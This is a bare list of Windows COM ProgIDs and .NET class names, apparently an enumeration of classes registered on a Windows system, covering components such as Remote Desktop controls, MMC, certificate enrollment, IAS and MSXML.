Author\nCImeCommentServerPlugInLocal.15\npolmkr.apmGpeEnvironment.1\nMsTscAx.MsTscAx.3\nSystem.Collections.CaseInsensitiveComparer\nPropshts.apmPageFileTransfer.1\nWebEnrlServer.WebEnrlServer.1\nSystem.EnterpriseServices.RegistrationConfig\nGPMGMT.GPMAsyncCancel.1\nCertificateAuthority.Config.1\nMsxml2.XMLSchemaCache\nSystem.Globalization.JapaneseCalendar\nCertificateAuthority.Admin.1\nMicrosoft.ActiveDirectory.TRLParserInterop.RulesLanguageParserInterop\ncertocm.CertSrvSetupKeyInformation.1\nObject.Microsoft.DXTFilter.1\nWired.About.1\nSystem.Security.Policy.GacMembershipCondition\nSAPI.SpObjectTokenEnum.1\nHyperV.AppHealthMonitor\nSystem.Security.Cryptography.MACTripleDES\nDXImageTransform.Microsoft.MaskFilter.1\nbrowser.apmBrowser.2\nIMECheckDefaultInputProfile.Japan.15\nMicrosoft.WINDOWS.SQLLITE.OLEDB.4.0\ncomponents.apmPropertySheetObject.1\nSystem.EnterpriseServices.Internal.ComManagedImportUtil\nDFSRHelper.ServerHealthReport.1\npolmkr.apmGpeFiles.1\nSystem.ArgumentNullException\nSapi.SpSharedRecognizer.1\npolmkr.apmGpeExplorer.1\nNODEMGR.MMCProtocol.1\nSystem.Text.UTF7Encoding\nSystem.Runtime.Remoting.RemotingTimeoutException\nMMCTask.MMCTask.1\nSystem.Security.Cryptography.RIPEMD160Managed\nTsmmc.Compdata.1\nMsxml2.MXXMLWriter.3.0\nSystem.Security.Policy.ApplicationDirectoryMembershipCondition\nOlePrn.AspHelp.1\nSystem.Threading.ThreadStateException\nMsxml2.SAXAttributes.3.0\nSystem.AppDomainSetup\npolmkr.apmGpeFolders.1\ncomponents.apmPropertyPageObject.1\nPropshts.apmSheetPowerOptions.1\nCCWU.ComCallWrapper.1\nSystem.Reflection.AssemblyNameProxy\nVBScript.RegExp\nPropshts.apmPageTask.1\nDXImageTransform.Microsoft.CrIris.1\nScwAuditExt.Audit.1\nSystem.Security.Cryptography.SignatureDescription\nSystem.EventArgs\nSystem.ArgumentException\nFX.Rowset.1\nSystem.Security.Cryptography.RNGCryptoServiceProvider\nSystem.Diagnostics.StackTrace\nSystem.Diagnostics.SymbolStore.SymDocumentType\nCOMSNAP.COMNSView.1\nSystem.Diagnostics.DebuggerHiddenAttribute\nInternet.HHCtrl.1\nSapi.SpInprocRecognizer.1\nSearch.XmlContentFilter.1\nScwSceExt.SCE.1\nDXImageTransform.Microsoft.Chroma.1\nSystem.SystemException\nMicrosoft.GroupPolicy.Targeting.GPMTargetingEditor\nDXImageTransform.Microsoft.CrRadialWipe.1\nSystem.OverflowException\nNODEMGR.NodeInitObject.1\ndevice.1\nMicrosoft.JScript.DebugConvert\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapIdref\nOlePrn.DSPrintQueue.1\nSystem.Version\nSystem.Security.Cryptography.SHA256Managed\ncomponents.apmPropertySheetObjectVistaTasks.1\nSystem.IO.IsolatedStorage.IsolatedStorageException\nATL.Registrar\nControl.TaskSymbol.1\nbrowser_dll.ctlDeviceBrowser.2\nPTRegTerminal.Class\nPropshts.apmSheetFileTransfer.1\nSAPI.SpNullPhoneConverter.1\nSystem.EnterpriseServices.Internal.AssemblyLocator\nPropshts.apmPageTaskSchedule.1\nSystem.Collections.Stack\npolmkr.apmComponentData.1\nPropshts.apmPageIniEdit.1\nSystem.Runtime.CompilerServices.CallConvThiscall\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapMonthDay\nVss.VSSShellExt.1\nITIR.WordWheelBuild.4\nITIR.Query.4\nITIR.ResultSet.4\nITIR.LocalWordWheel.4\nITIR.LocalDatabase.4\nITIR.LocalCatalog.4\nITIR.LocalGroup.4\nITIR.LocalGroupArray.4\nITIR.IndexSearch.4\nITIR.PropertyList.4\nITIR.StdWordBreaker.4\nHHCtrl.SystemSort.666\nITIR.SystemSort.4\nOldFont\nMSIME.Japan.FELang.15\nSystem.DllNotFoundException\nSAPI.SpSharedRecoContext.1\nADs\nSystem.Runtime.InteropServices.RegistrationServices\nSystem.Security.Cryptography.HMACSHA512\nSystem.Collections.CaseInsensitiveHashCodeProvider\npolmkr.apmDataObject.1\nWbemScripting.SWbemDateTime.1\nxmlfile\nAzRoles.AzPrincipalLocator.1\nSystem.Runtime.Remoting.Channels.TransportHeaders\nSystem.Threading.SynchronizationLockException\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapDateTime\nSystem.IO.FileNotFoundException\nSystem.Runtime.CompilerServices.MethodImplAttribute\nIAS.IASDataStoreComServer.1\nMMC20.Application.1\nTheme.ThemeThumbnail.1\nbrowser_dll.apmUserUpdater.2\nPropshts.apmPageVpnOptions.1\nDXImageTransform.Microsoft.Spiral.1\nMMC.SnapInFailureReporter.1\nDXImageTransform.Microsoft.Matrix.1\nMts.MtsGrp\nSystem.Runtime.CompilerServices.CompilerGlobalScopeAttribute\nERCLuaElevationHelper\nSystem.Runtime.InteropServices.SafeArrayRankMismatchException\nSystem.AccessViolationException\nCertificateAuthority.ServerExit.1\nScwServiceExt.Service.1\nSystem.Security.Cryptography.X509Certificates.X509Certificate\nimkrhjd.hanjadic.15\nFilePlaybackTerminal.FilePlaybackTerminal.1\nMicrosoft.Update.Session.1\nDXImageTransform.Microsoft.Pixelate.1\nSystem.Security.Cryptography.RSAOAEPKeyExchangeDeformatter\nMsxml2.SAXAttributes\nMSP.MSP.2\nMSExtUser\nCertificateAuthority.EncodeLongArray.1\nEventSystem.EventSystem.1\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapName\nSystem.Random\nPropshts.apmPagePowerAdvancedVista.1\nMsTscAx.MsTscAx.6\nMsRDP.MsRDP.5\nMsRDP.MsRDP.4\nWorkspaceRuntime.Workspace.1\nSystem.Runtime.Serialization.ObjectIDGenerator\nOlePrn.OleSNMP.1\nImePlugInDictDictionaryList1041.15\nPropshts.apmPageMachineSelect.1\nSystem.Runtime.Serialization.Formatters.Binary.BinaryFormatter\nImeLmTestApi1041.15\nSystem.STAThreadAttribute\nADSystemInfo\nPropshts.apmPageRegistryBrowser.1\nPropshts.apmPageTaskActionsVista.1\nPropshts.apmPageTaskConditionsVista.1\nPropshts.apmPageTaskGeneralVista.1\nPropshts.apmPageTaskSettingsVista.1\nPropshts.apmPageTaskTriggersVista.1\nPropshts.apmPageFolderOffFiles.1\nbrowser_dll.ctlVPNBrowser.2\npolmkr.apmGpeIniFile.1\nIMAPI.MSDiscRecorderObj.1\nIMAPI.MSDiscMasterObj.1\nLicense.Manager.1\nxmlfile\nInternet.HHCtrl.1\nSystem.Runtime.Remoting.InternalRemotingServices\npolmkr.apmGpeCompRoot.1\nMMCCtrl.MMCCtrl.1\nPropshts.apmPageSecurity.1\nADsDSOObject\nPropshts.apmPageStart.1\nMDACVer.Version.6.0\nMsRDP.MsRDP.4.a\nMsTscAx.MsTscAx.8\nMicrosoft.XMLDSO.1.0\nShellNameSpace.ShellNameSpace.1\nSystem.Runtime.Remoting.Contexts.SynchronizationAttribute\nSMEF.SMEFRegistrar.1\nSystem.Security.AllowPartiallyTrustedCallersAttribute\nWSHController\nMicrosoft.WINDOWS.SQLLITE.Params.4.0\nSystem.Runtime.Serialization.SerializationException\nPropshts.apmPageSecurityAuditing.1\nWbemScripting.SWbemObjectPath.1\nRdpCoreTS.WRdsProtocolManager.1\nSystem.MissingMethodException\nSystem.IO.EndOfStreamException\nFX.Rowset.1\nSystem.Runtime.CompilerServices.IUnknownConstantAttribute\nSystem.Diagnostics.SymbolStore.SymLanguageType\nPropshts.apmSheetImdTask.1\nCImeDictAPIBlockBinder.15\nSearch.SettingContentFilter.1\nDXImageTransform.Microsoft.Wheel.1\nSystem.Runtime.Remoting.Metadata.SoapFieldAttribute\npolmkr.apmGpeUserRoot.1\nMicrosoft.Update.Downloader.1\nGPOAdminCustom.SiteCollectionCtrl.1\nPropshts.apmSheetDataSource.1\nAzRoles.AzBizRuleContext.1\nSystem.Runtime.Remoting.Channels.ServerChannelSinkStack\nSystem.Globalization.JulianCalendar\nHNetCfg.HNetShare.1\nWMICntl.WMISnapin.1\nWMISnapinAbout.1\npolmkr.apmGpeInternet.1\nSystem.IndexOutOfRangeException\nTxCTx.TransactionContextEx\nMSITFS1.0\nSystem.Security.Cryptography.ToBase64Transform\nMsRDP.MsRDP.8\nSystem.EnterpriseServices.Internal.SoapUtility\nSAPI.SpMemoryStream.1\nSSR.SsrLog.1\nICOFilter.CoICOFilter.1\nAccServerDocMgr.AccServerDocMgr.1\nImeBrokerClient1028.1\nSystem.AppDomainUnloadedException\nWindows.Contact.1\nDXImageTransform.Microsoft.Gradient.1\nSystem.Security.Policy.Evidence\nIMESingleKanjiDict.15\nSystem.Security.Cryptography.RC2CryptoServiceProvider\nSystem.Runtime.InteropServices.ComRegisterFunctionAttribute\nstatemodel.StateController.1\nDXImageTransform.Microsoft.Strips.1\nGPOAdminCustom.TemplateCollectionCtrl.1\nSystem.ArithmeticException\nBehavior.Microsoft.DXTFilterBehavior.1\nShell.UIHelper.1\nMicrosoft.Update.WebProxy.1\nJobObjLimitInfoProv.JobObjLimitInfoProv.1\nOlePrn.OleCvt.1\nAccDictionary.AccDictionary.1\nWinNTSystemInfo\nDFSRHelper.HealthReport.1\nSystem.FlagsAttribute\nSystem.Security.Cryptography.DSACryptoServiceProvider\nSystem.ArrayTypeMismatchException\nQAgent.CNapElevated\nSystem.ApplicationException\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapNonNegativeInteger\nCertificateAuthority.PolicyManage.1\nSystem.Collections.ArrayList\nSystem.Globalization.GregorianCalendar\nActiveSockets.ActiveSocketsHandler.1\nPropshts.apmSheetDialUp.1\nWcsPlugInService.WcsPlugInService.1\nPropshts.apmPageStartClassicVista.1\nSSR.SsrActionData.1\nImgUtil.CoSniffStream.1\nMicrosoft.JScript.COMPropertyInfo\nPropshts.apmPageGroups.1\nFSLoaderParser2.DefinitionParser.1\nMsRdpWebAccess.MsRdpClientShell.1\nMsRDP.MsRDP.3.a\nMSIME.Japan.15\nMsTscAx.MsTscAx.5\nIAS.MachineInventory.1\nIAS.AuditChannel.1\nIAS.NTEventLog.1\nIAS.InfoBase.1\nIAS.Request.1\nIAS.DatabaseAccounting.1\nIAS.Accounting.1\nIAS.IasHelper.1\nIAS.ADsDataStore.1\nIAS.NetDataStore.1\nIAS.URHandler.1\nIAS.CClient.1\nIAS.ExternalAuthNames.1\nIAS.MachineNameMapper.1\nIAS.MachineAccountValidation.1\nIAS.EAPIdentity.1\nIAS.EAPTerminator.1\nIAS.MachineNTGroups.1\nIAS.UserNTGroups.1\nIAS.SHV.1\nIAS.QuarantineEvaluator.1\nIAS.PostQuarantineEvaluator.1\nIAS.CRPBasedEAP.1\nIAS.RadiusProtocol.1\nIAS.NTSamAuthentication.1\nIAS.MSChapErrorReporter.1\nIAS.BaseCampHost.1\nIAS.AuthorizationHost.1\nIAS.RAPBasedEAP.1\nIAS.ChangePassword.1\nIAS.NTSamPerUser.1\nIAS.NTSamNames.1\nIAS.UserAccountValidation.1\nIAS.RadiusProxy.1\nIAS.Match.1\nIAS.NTGroups.1\nIAS.TimeOfDay.1\nIAS.PolicyEnforcer.1\nIAS.ProxyPolicyEnforcer.1\nIAS.Realm.1\nIAS.EAPTypes.1\nIAS.AbsoluteTime.1\nIMEAPI.CImeRequestSenderJK.15\nSystem.EnterpriseServices.CompensatingResourceManager.ClerkMonitor\nPropshts.apmPageNetwork.1\nPropshts.apmSheetGroups.1\nCertificateAuthority.EncodeBitString.1\nCertificateAuthority.ExitManage.1\ncertocm.MscepUpgrade.1\nMTSAdmin.Catalog.1\ncommon_dll.apmSecurityExtension.1\nSystem.Security.Cryptography.RSAPKCS1SignatureDeformatter\nSystem.Runtime.Serialization.OnSerializedAttribute\nIMEAPI.CImeKeyMapViewJK.15\nSAPI.SpStreamFormatConverter.1\nDiskManagement.UITasks\nSystem.Globalization.DateTimeFormatInfo\nSAPI.SpStream.1\nWindows.ContactManager.1\nMTxAS.AppServer.1\nGPOAdmin.ScopeObject.1\nPropshts.apmPageFolderOpenWith.1\nSystem.Resources.MissingManifestResourceException\nPropshts.apmSheetPerformance.1\nWScript.Shell.1\nMicrosoft.Update.StringColl.1\nPropertyEntry\nDXImageTransform.Microsoft.Blur.1\nMsRDP.MsRDP.6\nSAPI.SpInProcRecoContext.1\nWordPad.Document.1\nregistryBrowser.atlRegistryBrowser.1\nSystem.Runtime.InteropServices.MarshalDirectiveException\nCryptPKO.CryptPKO.1\nCryptSig.CryptSig.1\nIMEFILES.CImeFileNameRedirectionManager.15\nSystem.ArgumentOutOfRangeException\nSystem.UnauthorizedAccessException\nEventSystem.EventSubscription\nWbemScripting.SWbemSink.1\nMsRDP.MsRDP.3\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapYear\nDXImageTransform.Microsoft.CrStretch.1\nHomePage.HomePage.1\nSystem.Globalization.TaiwanCalendar\nWbemScripting.SWbemLocator.1\nDXImageTransform.Microsoft.Inset.1\nSAPI.SpPhraseBuilder.1\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapToken\nSystem.Runtime.InteropServices.RuntimeEnvironment\nPropshts.apmSheetFolderOptionsVista.1\nUPnP.DeviceHostICSSupport.1\nMicrosoft.DiskQuota.1\nTxCTx.TransactionContext\npolmkr.apmGpeGroups.1\nMmcshext.ExtractIcon.1\nSystem.Security.SuppressUnmanagedCodeSecurityAttribute\nSystem.Security.Cryptography.PKCS1MaskGenerationMethod\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapPositiveInteger\nSystem.Reflection.InvalidFilterCriteriaException\nPropertyValue\nSystem.Security.Cryptography.RSAPKCS1SignatureFormatter\nImePlugInDictDictionaryList2052.15\nMSPersist.1\nGPOAdmin.SnapinAbout.1\nMsTscAx.MsTscAx.2\nWSMan.InternalAutomation.1\nSystem.Security.UnverifiableCodeAttribute\nSystem.NotFiniteNumberException\nScripting.Signer\nDNWithBinary\nNODEMGR.ScopeTreeObject.1\nSystem.InvalidCastException\nSystem.NullReferenceException\nSystem.Security.Cryptography.CryptographicException\nSystem.Collections.Queue\nJobObjectProv.JobObjectProv.1\nSystem.Security.Cryptography.SHA384Managed\nSystem.Threading.Overlapped\nPropshts.apmSheetPowerOptionsVista.1\nTrustmon.TrustPrv.1\nInfoPath.Document.1\nGPOAdminCustom.PlanningCollectionCtrl.1\nMessageView.MessageView.1\nDXImageTransform.Microsoft.CrSlide.1\nBehaviorFactory.Microsoft.DXTFilterFactory.1\nSystem.Object\nWireless.Extension.1\nX509Enrollment.CX509CertificateTemplateADWritable.1\nPropshts.apmSheetService.1\nSystem.Runtime.CompilerServices.DiscardableAttribute\nGPOAdminCustom.TroubleCollectionCtrl.1\nSystem.Security.HostSecurityManager\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapLanguage\nJSFile.HostEncode\nVBSFile.HostEncode\nPropshts.apmPagePowerSecurity.1\nMstsMhst.MstscMhst.1\nSeVA.SeVARemote.1\nPropshts.apmPageFileopTypes.1\nIMEPad.IMJPCLST.15\nMicrosoft.DirectSoundWavesReverbDMO.1\nSystem.IO.DirectoryNotFoundException\nFSLoaderParser.DefinitionLoader.1\nX509Enrollment.CObjectId.1\nX509Enrollment.CObjectIds.1\nX509Enrollment.CBinaryConverter.1\nX509Enrollment.CX500DistinguishedName.1\nX509Enrollment.CCspInformation.1\nX509Enrollment.CCspInformations.1\nX509Enrollment.CCspStatus.1\nX509Enrollment.CX509PublicKey.1\nX509Enrollment.CX509PrivateKey.1\nX509Enrollment.CX509Extension.1\nX509Enrollment.CX509Extensions.1\nX509Enrollment.CX509ExtensionKeyUsage.1\nX509Enrollment.CX509ExtensionEnhancedKeyUsage.1\nX509Enrollment.CX509ExtensionTemplateName.1\nX509Enrollment.CX509ExtensionTemplate.1\nX509Enrollment.CAlternativeName.1\nX509Enrollment.CAlternativeNames.1\nX509Enrollment.CX509ExtensionAlternativeNames.1\nX509Enrollment.CX509ExtensionBasicConstraints.1\nX509Enrollment.CX509ExtensionSubjectKeyIdentifier.1\nX509Enrollment.CX509ExtensionAuthorityKeyIdentifier.1\nX509Enrollment.CSmimeCapability.1\nX509Enrollment.CSmimeCapabilities.1\nX509Enrollment.CX509ExtensionSmimeCapabilities.1\nX509Enrollment.CPolicyQualifier.1\nX509Enrollment.CPolicyQualifiers.1\nX509Enrollment.CCertificatePolicy.1\nX509Enrollment.CCertificatePolicies.1\nX509Enrollment.CX509ExtensionCertificatePolicies.1\nX509Enrollment.CX509ExtensionMSApplicationPolicies.1\nX509Enrollment.CX509Attribute.1\nX509Enrollment.CX509Attributes.1\nX509Enrollment.CX509AttributeExtensions.1\nX509Enrollment.CX509AttributeClientId.1\nX509Enrollment.CX509AttributeRenewalCertificate.1\nX509Enrollment.CX509AttributeArchiveKey.1\nX509Enrollment.CX509AttributeArchiveKeyHash.1\nX509Enrollment.CX509AttributeOSVersion.1\nX509Enrollment.CX509AttributeCspProvider.1\nX509Enrollment.CCryptAttribute.1\nX509Enrollment.CCryptAttributes.1\nX509Enrollment.CCertProperty.1\nX509Enrollment.CCertProperties.1\nX509Enrollment.CCertPropertyFriendlyName.1\nX509Enrollment.CCertPropertyDescription.1\nX509Enrollment.CCertPropertyAutoEnroll.1\nX509Enrollment.CCertPropertyRequestOriginator.1\nX509Enrollment.CCertPropertySHA1Hash.1\nX509Enrollment.CCertPropertyKeyProvInfo.1\nX509Enrollment.CCertPropertyArchived.1\nX509Enrollment.CCertPropertyBackedUp.1\nX509Enrollment.CCertPropertyEnrollment.1\nX509Enrollment.CCertPropertyRenewal.1\nX509Enrollment.CCertPropertyArchivedKeyHash.1\nX509Enrollment.CSignerCertificate.1\nX509Enrollment.CX509NameValuePair.1\nX509Enrollment.CX509CertificateRequestPkcs10.1\nX509Enrollment.CX509CertificateRequestCertificate.1\nX509Enrollment.CX509CertificateRequestPkcs7.1\nX509Enrollment.CX509CertificateRequestCmc.1\nX509Enrollment.CX509Enrollment.1\nX509Enrollment.CX509EnrollmentWebClassFactory.1\nX509Enrollment.CCertPropertyEnrollmentPolicyServer.1\nX509Enrollment.CX509EnrollmentHelper.1\nX509Enrollment.CX509MachineEnrollmentFactory.1\nX509Enrollment.CX509CertificateRevocationListEntry.1\nX509Enrollment.CX509CertificateRevocationListEntries.1\nX509Enrollment.CX509CertificateRevocationList.1\nX509Enrollment.CX509SCEPEnrollment.1\nShell.Explorer.2\nImeCommonAPI1041.15\nSystem.Runtime.Serialization.SurrogateSelector\nMsxml2.DOMDocument.6.0\nMsxml2.FreeThreadedDOMDocument.6.0\nMsxml2.XMLSchemaCache.6.0\nMsxml2.XSLTemplate.6.0\nMsxml2.XMLHTTP.6.0\nMsxml2.ServerXMLHTTP.6.0\nMsxml2.SAXXMLReader.6.0\nMsxml2.SAXAttributes.6.0\nMsxml2.MXXMLWriter.6.0\nMsxml2.MXHTMLWriter.6.0\nMsxml2.MXNamespaceManager.6.0\nFDE.1\nSystem.EnterpriseServices.RegistrationHelper\nSystem.SerializableAttribute\nSystem.Security.Policy.PolicyException\nIMAPI.MSEnumDiscRecordersObj.1\nIEPH.RSSHandler\nSystem.Runtime.InteropServices.ComConversionLossAttribute\nWorkspace.Installer.1\nSppComApi.OfflineActivation.1\nPropshts.apmPageTaskSettings.1\nWinNT\nPropshts.apmPageRegionalNumbers.1\nMsTscAx.MsTscAx.10\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapHexBinary\nPropshts.apmPageTaskbar.1\nIAS.ExtensionHost.1\nSystem.Text.UTF8Encoding\nbrowser_dll.ctlDSNDriverBrowser.2\nReplicateCatalog.ReplicateCatalog.1\nbrowser_dll.ctlDSNBrowser.2\nSystem.MissingFieldException\nPropshts.apmPageSecuritySettings.1\nSAPI.SpCustomStream.1\nbrowser_dll.ctlPortPrinterSettings.1\nRegisterControl.Register.1\nDiskManagement.SnapInExtension\nPropshts.apmSheetDesktop.1\nKbproc.SCWRegistrar.1\nSystem.Runtime.InteropServices.ComUnregisterFunctionAttribute\nSystem.Security.Cryptography.DSASignatureFormatter\nITIR.EngStemmer.4\nSplSetup.CFindNetPrinters.1\nSystem.Runtime.Remoting.Lifetime.LifetimeServices\nGPMGMT.Forest.1\nPropshts.apmPageVpnSecurity.1\nMsRDP.MsRDP.2\nSAPI.SpCompressedLexicon.1\nMSIME.Japan.SuggestionFramework.15\nCLRMetaData.CLRRuntimeHost.1\nCLRMetaData.CLRRuntimeHost.2\nSystem.InvalidProgramException\nSystem.Threading.ReaderWriterLock\nSAPI.SpPhoneConverter.1\nFunctionDiscovery.UMBusDriver.1\nSppComApi.ElevationConfig.1\nX509Enrollment.CX509EnrollmentPolicyActiveDirectory.1\nX509Enrollment.CX509EnrollmentPolicyWebService.1\nX509Enrollment.CX509PolicyServerListManager.1\nX509Enrollment.CX509PolicyServerUrl.1\nSystem.Diagnostics.Debugger\nPropshts.apmPageSecurityCommon.1\nSearchIntegrationExe.CImeSearchIntegration.15\nOlePrn.PrinterURL.1\nRowsetHelper\nSystem.Security.Cryptography.RSAPKCS1KeyExchangeFormatter\nLargeInteger\nComplianceExtensions.SceComplianceExt.1\nSTClient.STClient.1\nSystem.MethodAccessException\nCOMSNAP.CPartitionSetPropPages.1\nDXImageTransform.Microsoft.CrInset.1\nSystem.Reflection.ObfuscationAttribute\nSystem.Diagnostics.DebuggerStepThroughAttribute\nMicrosoft.WINDOWS.SQLLITE.Errors.4.0\nSAPI.SpFileStream.1\npolmkr.apmGpeNetwork.1\nPropshts.apmSheetViewOptions.1\nMSExtGroup\nPropshts.apmSheetRegional.1\nDFSRHelper.PropagationReport.1\nSystem.InvalidOperationException\nImeKeyEventHandler1042.15\ncertocm.CertSrvSetup.1\nSystem.FormatException\nSystem.ContextStaticAttribute\nSAPI.SpResourceManager.1\nSAPI.SpVoice.1\nSystem.Runtime.InteropServices.InAttribute\nGPOAdminCustom.ForestCollectionCtrl.1\nMsRDP.MsRDP.2.a\npolmkr.apmSnapinAbout.1\nKrnlprov.KernelTraceProvider.1\nXML\nPropshts.apmPageRegProp.1\nApplication.Manifest\nCertificateAuthority.Request.1\nPropshts.apmSheetNetwork.1\ncertocm.CertificateEnrollmentServerSetup.1\nPropshts.apmSheetImdTaskVista.1\nIImeIPointSrv1041.15\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapEntities\nDXImageTransform.Microsoft.Compositor.1\nDXImageTransform.Microsoft.Blinds.1\nSystem.Runtime.InteropServices.InvalidOleVariantTypeException\ncertocm.PolicyEnrollUpgrade.1\npolmkr.apmGpePower.1\nWbemScripting.SWbemNamedValueSet.1\nRdpcomapi.RDPSession.1\nSystem.Runtime.Remoting.Metadata.SoapAttribute\nShell.FolderView.1\nPropshts.apmPageShortcut.1\nSystem.Runtime.Serialization.OnSerializingAttribute\nSystem.StackOverflowException\nSystem.Runtime.Remoting.Metadata.SoapTypeAttribute\nRoamingSecurity.RoamingSecurity.1\nMSITFS1.0\nMSITFS1.0\nSystem.Runtime.InteropServices.SetWin32ContextInIDispatchAttribute\nHNetCfg.FwProduct\nSystem.MulticastNotSupportedException\nPrevious.Versions\nSystem.Text.ASCIIEncoding\nSystem.EnterpriseServices.RegistrationHelperTx\nSCW.FeedbackObj.1\nSystem.Security.Cryptography.CryptoConfig\nSAPI.SpAudioFormat.1\nMSExtPrintQueue\nIMEAPI.CImeCommandAvailabilityViewJK.15\nDXImageTransform.Microsoft.Glow.1\nCOMSNAP.CPartitionNotify.1\nPropshts.apmSheetDrive.1\nSystem.Security.Cryptography.RSAOAEPKeyExchangeFormatter\nSystem.Text.UnicodeEncoding\nScwfirewallext.FirewallLogic.1\nCertificateAuthority.View.1\nSystem.IO.IOException\nSDSnapinAbout.1\nDXImageTransform.Microsoft.ICMFilter.1\nSystem.Exception\nbrowser_dll.ctlMsiPatchBrowser.2\nsmef.SMEFRuleLog.1\nWired.Extension.1\nGPOAdminCustom.ForestCtrl.1\napmFilter.apmFilter.1\nPropshts.apmPageServiceRecovery.1\nUPnP.UPnPDevice.1\nSystem.PlatformNotSupportedException\nSystem.Runtime.Remoting.Contexts.Context\nImeKeyEventHandler1041.15\nGPOAdminCustom.TroubleCtrl.1\nSystem.Runtime.CompilerServices.CallConvCdecl\nMsTscAx.MsTscAx.9\nPNGFilter.CoPNGFilter.1\nCImeDictAPIWebServiceComment.15\nMsTscAx.MsTscAx.1\nSppComApi.OnlineActivation.1\nVaultRoaming.VaultSettingsHandler.1\nPropshts.apmSheetFolderOptions.1\nSystem.Security.Policy.ApplicationTrust\nPropshts.apmSheetFileTypes.1\nImeBrokerClient2052.1\nDxDiag.DxDiagProvider.1\nSystem.Security.Cryptography.SHA512Managed\nPrintSys.CoPrintIsolationHost.1\nPropshts.apmPagePowerScheme.1\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapYearMonth\nSystem.Runtime.InteropServices.InvalidComObjectException\nSystem.Security.Cryptography.HMACMD5\nObject.Microsoft.DXTFilterCollection.1\nImgUtil.CoDitherToRGB8.1\nUdtool.UserDicManager.15\npolmkr.apmGpePrinters.1\nSAPI.SpMMAudioOut.1\nSystem.Runtime.Serialization.Formatters.SoapFault\nWMINet_Utils.WmiSecurityHelper.1\nSystem.IO.DriveNotFoundException\nSAPI.SpObjectTokenCategory.1\nMsRDP.MsRDP.7\nCertificateAuthority.ServerPolicy.1\nSppComApi.LicensingStateTools.1\ncertocm.MSCEPSetup.1\nSymBinder\nSystem.DataMisalignedException\nPropshts.apmPageDialUp.1\nSAPI.SpMMAudioEnum.1\nJobObjSecLimitInfoProv.JobObjSecLimitInfoProv.1\nSystem.EnterpriseServices.CompensatingResourceManager.Compensator\nCOMSNAP.CPartitionContextMenu.1\nEventSystem.EventPublisher.1\nRequestMakeCall.RequestMakeCall.1\nMSIME.Japan.LMDS.15\nDXImageTransform.Microsoft.CrSpiral.1\nMsTscAx.MsTscAx.4\nSystem.EntryPointNotFoundException\nSystem.Security.Permissions.HostProtectionAttribute\nHHCtrl.FileFinder.1\nInternet.HHCtrl.1\nWindows.Xbap\nDXImageTransform.Microsoft.Alpha.1\nDXImageTransform.Microsoft.DropShadow.1\nDXImageTransform.Microsoft.Wave.1\nNODEMGR.AppEventsDHTMLConnector.1\nHNetCfg.NATUPnP.1\nScriptBridge.ScriptBridge.1\nSystem.Security.Cryptography.HMACSHA384\nDiskManagement.Control\nTerminalManager.Class\nDXImageTransform.Microsoft.Wipe.1\nUPnP.SOAPRequest.1\nSystem.Security.Cryptography.CspParameters\nSystem.IO.FileLoadException\nIMEAPI.CImePropertyJK.15\nSystem.Security.Policy.TrustManagerContext\nMsxml2.ServerXMLHTTP.3.0\nMsxml2.ServerXMLHTTP\nSystem.Runtime.InteropServices.ExternalException\ncertocm.CertificateEnrollmentPolicyServerSetup.1\nSystem.Data.SqlClient.SQLDebugging\nPropshts.apmSheetFileFolder.1\nMMC.IconControl.1\nPropshts.apmSheetTasks.1\nSystem.EnterpriseServices.Internal.ComSoapPublishError\nfRecordingTerminal.FileRecordingTerminal.1\nSAPI.SpGrammarCompiler.1\nMicrosoft.GroupPolicy.AdmTmplEditor.GPMAdmTmplEditorManager\nSSR.SsrEngine.1\nAzRoles.AzAuthorizationStore.1\nPropshts.apmPageRegionalCurrency.1\nPropshts.apmPageUsers.1\nDXImageTransform.Microsoft.CheckerBoard.1\nMMC.ExecutivePlatform.1\nSystem.MTAThreadAttribute\nMSTSWebProxy.MSTSWebProxy.1\nRasDialin.UserAdminExt.1\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapNotation\nVBScript\nVBScript Author\nVBScript.Encode\nMicrosoft.Update.Searcher.1\nSystem.Security.Cryptography.DESCryptoServiceProvider\nNODEMGR.MMCViewExt.1\nMicrosoft.JScript.Vsa.VsaEngine\nAccessControlEntry\nSystem.Runtime.InteropServices.OptionalAttribute\nCImeDictAPILexiconBuilder.15\nAccessControlList\nbidispl.bidirequest.1\nSecurityDescriptor\nDXImageTransform.Microsoft.GradientWipe.1\npolmkr.apmGpeRegional.1\nUPnP.UPnPDevices.1\npolmkr.apmCallback.1\nFunctionDiscovery.FunctionInstanceCollection.1\nCfgComp.CfgComp.1\nMicrosoft.Update.AgentUpdater.1\nPTRegTerminalClass.Class\nSystem.Runtime.Remoting.Services.EnterpriseServicesHelper\nIAS.SdoService.1\nSystem.Runtime.CompilerServices.CallConvStdcall\nDfsShell.DfsShellAdmin.1\nWSMan.Automation.1\nSDSnapin.SDSnapin.1\nRDS.DataControl.6.0\nRDS.DataSpace.6.0\nSystem.FieldAccessException\nPropshts.apmPageRegionalTime.1\npolmkr.apmGpeRegistry.1\nPropshts.apmPageFileFolder.1\nDocWrap.DocWrap.1\nbrowser_dll.ctlDOMEventReturn.2\npolmkr.apmGpeNetworkShares.1\nMicrosoft.Update.AutoUpdate.1\nSystem.IO.PathTooLongException\nMicrosoft.Update.SystemInfo.1\nPropshts.apmSheetOpenWith.1\nSystem.AppDomainManager\nSQLOLEDB 